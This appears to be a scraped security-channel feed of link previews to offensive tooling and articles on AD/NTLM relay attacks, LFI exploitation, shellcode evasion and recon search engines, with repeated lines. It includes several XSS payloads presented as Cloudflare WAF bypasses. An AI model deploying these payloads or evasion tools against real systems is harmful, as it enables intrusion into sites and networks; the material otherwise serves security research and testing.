How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks - Praetorian
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
https://www.praetorian.com/blog/how-to-exploit-active-directory-acl-attack-paths-through-ldap-relaying-attacks/
Praetorian
How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying Attacks
Overview This article describes methods by which an attacker can induce a victim user into authenticating using the NT Lan Manager (NTLM) Authentication Protocol to an attacker-controlled “Intranet” site, even in instances where that site points to an external…
GitHub - payloadbox/sql-injection-payload-list: 🎯 SQL Injection Payload List
https://github.com/payloadbox/sql-injection-payload-list
https://github.com/payloadbox/sql-injection-payload-list
Some Cloudflare's latest XSS Bypass:
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
XSS"><body %00 onControl hello onmouseleave=confirm(domain) x>XSS
XSS"><html><select %00 onControl onpointerenter=prompt(domain) hello>
XSS"><input %00 onControl hello oninput=confirm(domain) x>
Pentesting_Active_directory - XMind - Mind Mapping Software
https://www.xmind.net/m/5dypm8/
https://www.xmind.net/m/5dypm8/
👍1
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
https://github.com/epi052/feroxbuster
https://github.com/epi052/feroxbuster
GitHub
GitHub - epi052/feroxbuster: A fast, simple, recursive content discovery tool written in Rust.
A fast, simple, recursive content discovery tool written in Rust. - epi052/feroxbuster
Best search 🔎 engines for Pentesters and Security Professionals.
→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io
→ google .com
→ Shodan .io
→ Censys .io
→ Hunter .io
→ redhuntlabs .com
→ fullhunt .io
→ onyphe .io
→ fofa .so
→ socradar .io
→ synapsint .com
→ binaryedge .io
→ ivre .rocks
→ crt .sh
→ spyse .com
→ vulners .com
→ PublicWWW .com
→ Pulsedive .com
→ ZoomEye .org
→ intelx .io
→ WiGLE .net
→ reposify .com
→ viz. greynoise .io
GitHub - mzfr/liffy: Local file inclusion exploitation tool
https://github.com/mzfr/liffy
https://github.com/mzfr/liffy
GitHub
GitHub - mzfr/liffy: Local file inclusion exploitation tool
Local file inclusion exploitation tool. Contribute to mzfr/liffy development by creating an account on GitHub.
🔥1
GitHub - Cracked5pider/Ekko: Sleep Obfuscation
https://github.com/Cracked5pider/Ekko
https://github.com/Cracked5pider/Ekko
GitHub
GitHub - Cracked5pider/Ekko: Sleep Obfuscation
Sleep Obfuscation. Contribute to Cracked5pider/Ekko development by creating an account on GitHub.
MSRPC-to-ATTACK/MS-DFSNM.md at main · jsecurity101/MSRPC-to-ATTACK · GitHub
https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DFSNM.md
https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/main/documents/MS-DFSNM.md
GitHub
MSRPC-to-ATTACK/documents/MS-DFSNM.md at main · jsecurity101/MSRPC-to-ATTACK
A repository that maps commonly used attacks using MSRPC protocols to ATT&CK - jsecurity101/MSRPC-to-ATTACK
New NTLM Relay Attack Lets Attackers Take Control Over Windows Domain
https://thehackernews.com/2022/06/new-ntlm-relay-attack-lets-attackers.html?m=1
https://thehackernews.com/2022/06/new-ntlm-relay-attack-lets-attackers.html?m=1
Domain Escalation – sAMAccountName Spoofing – Penetration Testing Lab
https://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing/
https://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing/
Penetration Testing Lab
Domain Escalation – sAMAccountName Spoofing
Computer accounts have the $ sign appended at the end of their names in contrast with standard user accounts. By default Microsoft operating systems lack of security controls and hardening that wou…
Attacking With WebView2 Applications | mr.d0x
https://mrd0x.com/attacking-with-webview2-applications/
https://mrd0x.com/attacking-with-webview2-applications/
Mrd0X
Security Research | mr.d0x
Providing security research and red team techniques
GitHub - mgeeky/ThreadStackSpoofer: Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
https://github.com/mgeeky/ThreadStackSpoofer
https://github.com/mgeeky/ThreadStackSpoofer
GitHub
GitHub - mgeeky/ThreadStackSpoofer: Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better…
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts. - mgeeky/ThreadStackSpoofer